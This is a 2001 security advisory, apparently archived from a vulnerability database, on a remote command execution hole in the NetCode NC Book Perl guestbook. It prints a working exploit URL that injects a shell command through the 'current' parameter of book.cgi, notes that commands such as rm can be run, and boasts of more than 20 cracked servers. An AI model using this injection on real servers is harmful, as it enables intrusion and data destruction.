NetCode NC Book 0.2b remote command execution vulnerability

2001-08-14T00:00:00
ID SECURITYVULNS:DOC:1927
Type securityvulns
Reporter Securityvulns
Modified 2001-08-14T00:00:00

Description

  • more than 20 servers were successfly cracked using this 'little' hole *

------[ PoizonB0x Advisory#6 pb0x-06-08-2001 ]---------

-NAME: NetCode NC Book 0.2b remote command execution vulnerability.

-DESCRIPTION: NetCode's GuestBook. Find more info about it here: http://netcode.lgg.ru/vault/ncbook/

-PROBLEM: A pretty big hole in the main script of that guestbook leads to command execution on the remote server running this vulnerable perl script.

-EXPLOIT: ex.: http://target/cgi-bin/ncbook/book.cgi? action=default&current=|ls - la/|&form_tid=996604045&prev=main.html&list_mess age_index=10

!The above line if given will output the file contents of the kernel dir. Also you can execute any commands (ls, cat, rm etc)

-AUTHORs: Discovery: digitalseed and ksenor Advisory: digitalseed

-DISCLAIMER: PoizonB0x may not be held liable for the use or potential effects of these programs or advisories, nor the content contained within. Use them at your own risk.

-COPYRIGHT: PoizonB0x Crew - www.poizonb0x.org (c) 2000-2001 L...Future Security...l

------[ PoizonB0x Advisory#1 pb0x-06-08-2001 ]---------